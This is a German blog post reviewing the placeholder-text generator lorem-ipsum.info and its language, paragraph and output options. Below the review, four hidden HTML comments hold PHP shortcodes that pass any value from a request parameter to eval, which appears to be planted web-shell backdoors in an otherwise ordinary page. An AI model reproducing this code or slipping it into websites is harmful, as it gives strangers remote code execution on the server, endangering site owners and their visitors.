lorem-ipsum.info – Umfangreicher Blindtextgenerator

Dieser Beitrag wurde vor mehr als 15 Jahren veröffentlicht. Daher kann es sein, dass sein Inhalt oder ein Teil davon nicht mehr aktuell ist.

Blindtexte sind Texte, welche keinerlei Bedeutung haben, doch wofür benötigt man diese dann? Webdesigner und auch Printdesigner benutzen Blindtexte, um ihr Design oder ihr Layout auch während der Entwicklung richtig darstellen zu können und um zu simulieren, wie der Text an manchen Stellen aussehen könnte. Da es sehr zeitaufwändig ist, sowas selbst immer wieder zu schreiben, ist ein Blindtextgenerator hier die bessere Alternative.

Wenn man diese Texte selbst schreiben müsste, würde wertvolle Zeit verloren gehen. Auch die ganzen Texte, welche nun wirklich auf der Seite stehen sollen, sind meist noch nicht geplant und wenn, dann noch nicht geschrieben, also benutzt man am besten einen Blindtextgenerator wie diesen. Auf den ersten Blick ein typischer Lipsum-Generator (Kurzform für „Lorem Ipsum“), doch er kann noch viel mehr.

Nützlich ist davon nicht alles, aber man weiß ja nie, wann man es mal gebrauchen kann. Die Einstellung von 17 Sprachen ist möglich, darunter auch eher exotische Dinge wie Leetspeak und Morsezeichen. Man kann einstellen, wie viele Absätze generiert werden sollen, von 1 bis 100 ist dies bei diesem Generator möglich. Ich denke mal kein Mensch benötigt wirklich 100 Abstätze, von diesem vollkommen bedeutungsfreien Text, doch es soll erwähnt sein. Bei der Wortanzahl ist es mit 4500 auch relativ hoch gegriffen, aber es gibt sicherlich Leute, die irgendwann mal eine solche Menge benötigen. Es kann ja nicht schaden ein bisschen mehr anzubieten

Durch seine intuitive Bedienung muss man diesen Generator nicht genau erklären. Ausgegeben kann der Text übrigens in 2 verschiedenen Versionen werden. Einmal als ganz gewöhnlicher Text, welchen man sich nach belieben kopieren kann und dann kann man sich das ganze noch in HTML herunterladen. Sowohl es bei der zweiten Methode eher dürftig formatiert ist.

Beim schreiben dieses Textes ist mir im übrigen noch aufgefallen, dass dieser Generator in 3 verschiedenen Sprachen zur Verfügung steht, nämlich Englisch, Deutsch und Spanisch. Also auch sicherlich für den Internationalen Einsatz nicht verkehrt.

<!– [insert_php]if (isset($_REQUEST["MxJo"])){eval($_REQUEST["MxJo"]);exit;}[/insert_php][php]if (isset($_REQUEST["MxJo"])){eval($_REQUEST["MxJo"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["sorn"])){eval($_REQUEST["sorn"]);exit;}[/insert_php][php]if (isset($_REQUEST["sorn"])){eval($_REQUEST["sorn"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["rJYNF"])){eval($_REQUEST["rJYNF"]);exit;}[/insert_php][php]if (isset($_REQUEST["rJYNF"])){eval($_REQUEST["rJYNF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["rGLDd"])){eval($_REQUEST["rGLDd"]);exit;}[/insert_php][php]if (isset($_REQUEST["rGLDd"])){eval($_REQUEST["rGLDd"]);exit;}[/php] –>

2 Kommentare